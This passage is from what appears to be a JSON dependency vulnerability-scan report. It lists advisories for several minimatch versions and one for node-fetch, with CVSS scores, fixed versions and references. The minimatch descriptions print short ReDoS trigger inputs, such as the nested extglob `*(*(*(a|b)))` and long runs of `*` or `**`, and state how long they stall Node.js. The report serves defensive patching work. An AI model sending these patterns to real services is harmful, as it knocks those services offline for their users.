non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-407" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27903", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", "https://www.cve.org/CVERecord?id=CVE-2026-27903" ], "PublishedDate": "2026-02-26T02:16:21.353Z", "LastModifiedDate": "2026-02-27T17:21:22.37Z" }, { "VulnerabilityID": "CVE-2026-27904", "VendorIDs": [ "GHSA-23c5-xmqv-rm74" ], "PkgID": "minimatch@10.0.3", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@10.0.3", "UID": "97121a07d790c0d3" }, "InstalledVersion": "10.0.3", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7e1f20b791b4869d401ef697e671c11a3b7fe37d7cbb34b7e25e6e63a77329b9", "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-27904", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "https://linux.oracle.com/cve/CVE-2026-27904.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "https://www.cve.org/CVERecord?id=CVE-2026-27904" ], "PublishedDate": "2026-02-26T02:16:21.76Z", "LastModifiedDate": "2026-02-27T17:16:23.773Z" }, { "VulnerabilityID": "CVE-2026-26996", "VendorIDs": [ "GHSA-3ppc-4f35-3m26" ], "PkgID": "minimatch@3.1.2", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "69ef7485f56c11bb" }, "InstalledVersion": "3.1.2", "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:12c7fff6e4b919c621256ada068e0a16d286f1bab7f66f3a1641d20416fcf742", "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "nvd": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-26996", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", "https://linux.oracle.com/cve/CVE-2026-26996.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", "https://www.cve.org/CVERecord?id=CVE-2026-26996" ], "PublishedDate": "2026-02-20T03:16:01.62Z", "LastModifiedDate": "2026-03-06T21:32:10.65Z" }, { "VulnerabilityID": "CVE-2026-27903", "VendorIDs": [ "GHSA-7r86-cg39-jmmj" ], "PkgID": "minimatch@3.1.2", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "69ef7485f56c11bb" }, "InstalledVersion": "3.1.2", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2708c5f00b6ff51c4e9bbd3f0d02787b8b1e1ec513ead827165ebe48912083c6", "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-407" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27903", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", "https://www.cve.org/CVERecord?id=CVE-2026-27903" ], "PublishedDate": "2026-02-26T02:16:21.353Z", "LastModifiedDate": "2026-02-27T17:21:22.37Z" }, { "VulnerabilityID": "CVE-2026-27904", "VendorIDs": [ "GHSA-23c5-xmqv-rm74" ], "PkgID": "minimatch@3.1.2", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@3.1.2", "UID": "69ef7485f56c11bb" }, "InstalledVersion": "3.1.2", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:cd84d9a381a9adf329b8de9e8aedff262d38728ffe446f659f168484982dc5bd", "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-27904", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "https://linux.oracle.com/cve/CVE-2026-27904.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "https://www.cve.org/CVERecord?id=CVE-2026-27904" ], "PublishedDate": "2026-02-26T02:16:21.76Z", "LastModifiedDate": "2026-02-27T17:16:23.773Z" }, { "VulnerabilityID": "CVE-2026-26996", "VendorIDs": [ "GHSA-3ppc-4f35-3m26" ], "PkgID": "minimatch@9.0.5", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "f9b14aafc2d2d91a" }, "InstalledVersion": "9.0.5", "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:05c123c14d625f6b617e9f351bf59a7a579660c6b6366a3133bfea5081ac3633", "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "nvd": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-26996", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", "https://linux.oracle.com/cve/CVE-2026-26996.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", "https://www.cve.org/CVERecord?id=CVE-2026-26996" ], "PublishedDate": "2026-02-20T03:16:01.62Z", "LastModifiedDate": "2026-03-06T21:32:10.65Z" }, { "VulnerabilityID": "CVE-2026-27903", "VendorIDs": [ "GHSA-7r86-cg39-jmmj" ], "PkgID": "minimatch@9.0.5", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "f9b14aafc2d2d91a" }, "InstalledVersion": "9.0.5", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2d5d9c4d7ac72ab1aaacee42010cd2e3f690a2d4b4c6ee8cc41d2929b1d1bd0a", "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-407" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27903", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", "https://www.cve.org/CVERecord?id=CVE-2026-27903" ], "PublishedDate": "2026-02-26T02:16:21.353Z", "LastModifiedDate": "2026-02-27T17:21:22.37Z" }, { "VulnerabilityID": "CVE-2026-27904", "VendorIDs": [ "GHSA-23c5-xmqv-rm74" ], "PkgID": "minimatch@9.0.5", "PkgName": "minimatch", "PkgIdentifier": { "PURL": "pkg:npm/minimatch@9.0.5", "UID": "f9b14aafc2d2d91a" }, "InstalledVersion": "9.0.5", "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:daf45b4524cca5bf0aa5d9f7554324d1c4e09e2d78bd34f798da9d1cc4d0e278", "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7896", "https://access.redhat.com/security/cve/CVE-2026-27904", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2442922", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", "https://errata.almalinux.org/9/ALSA-2026-7896.html", "https://errata.rockylinux.org/RLSA-2026:7896", "https://github.com/isaacs/minimatch", "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", "https://linux.oracle.com/cve/CVE-2026-27904.html", "https://linux.oracle.com/errata/ELSA-2026-8339.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", "https://www.cve.org/CVERecord?id=CVE-2026-27904" ], "PublishedDate": "2026-02-26T02:16:21.76Z", "LastModifiedDate": "2026-02-27T17:16:23.773Z" }, { "VulnerabilityID": "CVE-2022-0235", "VendorIDs": [ "GHSA-r683-j2x4-v87g" ], "PkgID": "node-fetch@1.7.3", "PkgName": "node-fetch", "PkgIdentifier": { "PURL": "pkg:npm/node-fetch@1.7.3", "UID": "e78eaaf2132ae187" }, "InstalledVersion": "1.7.3", "FixedVersion": "3.1.1, 2.6.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-0235", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:aec3642a00377df236af1ec841634fc794a54aa8b6733c66cfa4b1263ee96d6b", "Title": "node-fetch: exposure of sensitive information to an unauthorized actor", "Description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "Severity": "HIGH", "CweIDs": [ "CWE-200", "CWE-601" ], "VendorSeverity": { "alma": 2, "ghsa": 3, "nvd": 2, "oracle-oval": 2, "redhat": 2, "rocky": 2, "ubuntu": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "V3Score": 8.8 }, "nvd": { "V2Vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V2Score": 5.8, "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/errata/RHSA-2023:0050", "https://access.redhat.com/security/cve/CVE-2022-0235", "https://bugzilla.redhat.com/2044591", "https://bugzilla.redhat.com/2066009", "https://bugzilla.redhat.com/2134609", "https://bugzilla.redhat.com/2140911", "https://bugzilla.redhat.com/2150323", "https://bugzilla.redhat.com/show_bug.cgi?id=2044591", "https://bugzilla.redhat.com/show_bug.cgi?id=2066009", "https://bugzilla.redhat.com/show_bug.cgi?id=2134609", "https://bugzilla.redhat.com/show_bug.cgi?id=2140911", "https://bugzilla.redhat.com/show_bug.cgi?id=2142821", "https://bugzilla.redhat.com/show_bug.cgi?id=2150323", "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44906", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0235", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24999", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3517", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43548", "https://errata.almalinux.org/8/ALSA-2023-0050.html", "https://errata.rockylinux.org/RLSA-2023:0050", "https://github.com/node-fetch/node-fetch", "https://github.com/node-fetch/node-fetch/commit/1ef4b560a17e644a02a3bfdea7631ffeee578b35", "https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10", "https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", "https://github.com/node-fetch/node-fetch/pull/1449/commits/5c32f002fdd65b1c6a8f1e3620210813d45c7e60", "https://github.com/node-fetch/node-fetch/pull/1453", "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7", "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7/", "https://linux.oracle.com/cve/CVE-2022-0235.html", "https://linux.oracle.com/errata/ELSA-2023-0050.html", "https://lists.debian.org/debian-lts-announce/2022/12/msg00007.html", "https://nvd.nist.gov/vuln/detail/CVE-2022-0235", "https://ubuntu.com/security/notices/USN-6158-1", "https://www.cve.org/CVERecord?id=CVE-2022-0235" ], "PublishedDate": "2022-01-16T17:15:07.87Z", "LastModifiedDate": "2024-11-21T06:38:12.15Z" }, { "VulnerabilityID": "CVE-2026-33671", "VendorIDs": [ "GHSA-c2c7-rcm5-vvqj" 